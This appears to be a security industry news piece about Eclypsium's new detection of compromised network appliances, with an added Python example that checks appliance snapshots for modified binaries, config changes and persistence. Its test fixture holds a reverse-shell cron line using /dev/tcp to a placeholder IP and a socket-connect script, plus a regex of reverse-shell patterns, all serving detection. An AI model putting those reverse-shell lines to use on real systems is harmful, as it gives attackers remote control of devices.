Eclypsium’s threat detection capabilities defend network infrastructure from cybercriminals
Eclypsium has added new threat detection capabilities for network appliances to its Eclypsium supply chain security platform.
Over the past summer, ransomware groups including Akira, CACTUS, FIN8, and LockBit have been observed attacking network appliances from a number of vendors, looking to evade endpoint security and maintain persistence within target environments.
In addition, state-sponsored adversaries continue to target network devices, with the NSA and CISA recently issuing an advisory about the BlackTech group targeting network routers from multiple vendors.
“The number of remotely exploitable vulnerabilities that keep shipping in network appliances underscores weaknesses in the supply chain for enterprise IT infrastructure,” says Eclypsium CEO Yuriy Bulygin. “Defenders cannot trust these appliances to ship securely by default, but should rather anticipate and mitigate their supply chain risk. Simply scanning for vulnerabilities doesn’t do much to help overloaded security teams prevent ransomware and other threat actors from getting in through, or establishing persistence in, network infrastructure devices. We believe this problem has to be solved differently.”
Ransomware groups are adept at evading detection and routinely target IT infrastructure such as network equipment, which is typically opaque to endpoint security tools. These devices sit on the network perimeter with broad reachability into the environment, so they offer wide access for lateral movement, and their configuration can be maliciously altered to hide command-and-control (C2) traffic.
So far in 2023, there have been several ransomware campaigns exploiting vulnerabilities in network infrastructure:
- In August, LockBit and Akira exploited a zero-day vulnerability in Cisco VPN appliances
- In July, FIN8 installed webshells on nearly 2,000 unpatched Citrix NetScaler devices
- In June, Akira was discovered to be exploiting flaws in Fortinet VPN appliances
- In May, CACTUS was reported to be attacking unspecified vulnerable VPN appliances
The new capabilities added to the Eclypsium supply chain security platform detect ongoing compromise of network appliances, including those from Cisco, F5 Networks, Fortinet, and Citrix (NetScaler), with appliances from more vendors being added. Specifically, the detections look for indicators of compromise on both physical and cloud (virtual) versions of these appliances: changes to firmware and OS binaries, modified configuration and backup files, reverse shells, and persistence modules.
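The indicator classes listed above map onto a few concrete checks that any practitioner can run against a snapshot of an appliance's filesystem. The following is an added example, not Eclypsium's code or any vendor's detection logic: it compares a snapshot (modelled as an in-memory path-to-bytes dict, with constructed sample contents) against a constructed known-good manifest and baseline configuration, diffs the config, and scans the usual persistence locations (crontab, rc.local, cron.d, init.d) for reverse-shell patterns and unexpected modules. The hashes, file contents, the `/nsconfig/ns.conf` config path, and the regex patterns are all assumptions made for the example.

```python
"""Baseline-versus-snapshot integrity checks for a network appliance.

Added example, not Eclypsium code. The appliance filesystem is modelled as a
dict of path -> bytes (constructed sample data); the vendor manifest and the
baseline configuration are constructed too; the reverse-shell patterns are
ordinary heuristics, not any vendor's signature set.
"""
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed "known-good" file contents; the manifest is derived from them.
_GOOD_FILES = {
    "/bin/sh": b"\x7fELF-sh-vendor-build-1.0",
    "/usr/lib/libssl.so": b"\x7fELF-libssl-vendor-build-1.0",
    "/opt/appliance/firmware.bin": b"FWIMG-v7.2.1",
}
VENDOR_MANIFEST = {p: sha256_hex(c) for p, c in _GOOD_FILES.items()}

# Constructed baseline config (path is an assumption for the example).
CONFIG_PATH = "/nsconfig/ns.conf"
BASELINE_CONFIG = b"admin-password-policy strict\nssh-enabled no\nsyslog-server 10.0.0.5\n"

# Locations where persistence is commonly planted, and the modules expected there.
PERSISTENCE_PATHS = ("/etc/crontab", "/etc/rc.local", "/etc/cron.d/", "/etc/init.d/")
KNOWN_PERSISTENCE = {"/etc/crontab", "/etc/rc.local",
                     "/etc/cron.d/vendor-housekeeping", "/etc/init.d/vendor-daemon"}

# Heuristic reverse-shell patterns (illustrative, deliberately narrow).
REVERSE_SHELL_RE = re.compile(
    r"(/dev/tcp/|\bnc\b[^\n]*\s-e\s|\bncat\b[^\n]*--exec|\bsocket\b[^\n]*\.connect\(|\bbash -i\b)"
)


def check_binaries(snapshot, manifest=VENDOR_MANIFEST):
    """Flag firmware/OS binaries whose hash differs from the manifest or that are missing."""
    findings = []
    for path, expected in manifest.items():
        if path not in snapshot:
            findings.append(("missing_binary", path))
        elif sha256_hex(snapshot[path]) != expected:
            findings.append(("modified_binary", path))
    return findings


def check_config(snapshot, path=CONFIG_PATH, baseline=BASELINE_CONFIG):
    """Line-set diff of the running config against the baseline."""
    current = set(snapshot.get(path, b"").decode().splitlines())
    base = set(baseline.decode().splitlines())
    return ([("config_added", line) for line in sorted(current - base)]
            + [("config_removed", line) for line in sorted(base - current)])


def scan_persistence(snapshot):
    """Look for reverse-shell one-liners and unexpected modules in persistence locations."""
    findings = []
    for path, content in snapshot.items():
        if not path.startswith(PERSISTENCE_PATHS):
            continue
        for lineno, line in enumerate(content.decode(errors="replace").splitlines(), 1):
            if REVERSE_SHELL_RE.search(line):
                findings.append(("reverse_shell", f"{path}:{lineno}"))
        if path.startswith(("/etc/cron.d/", "/etc/init.d/")) and path not in KNOWN_PERSISTENCE:
            findings.append(("unknown_persistence_module", path))
    return findings


def run_checks(snapshot):
    return check_binaries(snapshot) + check_config(snapshot) + scan_persistence(snapshot)


# Constructed snapshots: one clean, one showing all four indicator classes.
CLEAN_SNAPSHOT = {
    **_GOOD_FILES,
    CONFIG_PATH: BASELINE_CONFIG,
    "/etc/crontab": b"0 * * * * root /usr/bin/logrotate\n",
    "/etc/cron.d/vendor-housekeeping": b"30 2 * * * root /opt/appliance/cleanup\n",
}
COMPROMISED_SNAPSHOT = {
    "/bin/sh": _GOOD_FILES["/bin/sh"],
    "/usr/lib/libssl.so": b"\x7fELF-libssl-TROJANED",          # backdoored library
    "/opt/appliance/firmware.bin": _GOOD_FILES["/opt/appliance/firmware.bin"],
    CONFIG_PATH: b"admin-password-policy strict\nssh-enabled yes\nsyslog-server 10.0.0.5\n",
    "/etc/crontab": (b"0 * * * * root /usr/bin/logrotate\n"
                     b"*/5 * * * * root bash -i >& /dev/tcp/203.0.113.7/4444 0>&1\n"),
    "/etc/cron.d/vendor-housekeeping": b"30 2 * * * root /opt/appliance/cleanup\n",
    "/etc/init.d/.update": (b"#!/bin/sh\n"
                            b"python3 -c 'import socket;s=socket.socket();s.connect((\"203.0.113.7\",443))'\n"),
}

if __name__ == "__main__":
    for kind, detail in run_checks(COMPROMISED_SNAPSHOT):
        print(f"{kind:28s} {detail}")
```

In practice the manifest comes from the vendor's signed image (or a hash of a freshly installed unit), the snapshot from a support bundle, a mounted virtual disk, or an out-of-band read of the device, and the config diff is run against the last known-good backup; the point is that each of the four indicator classes reduces to a comparison against a trusted baseline plus a small set of pattern checks, which is exactly what a vulnerability scan alone does not give you.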
These threat detection capabilities augment Eclypsium’s existing vulnerability and security posture assessment capabilities for these devices.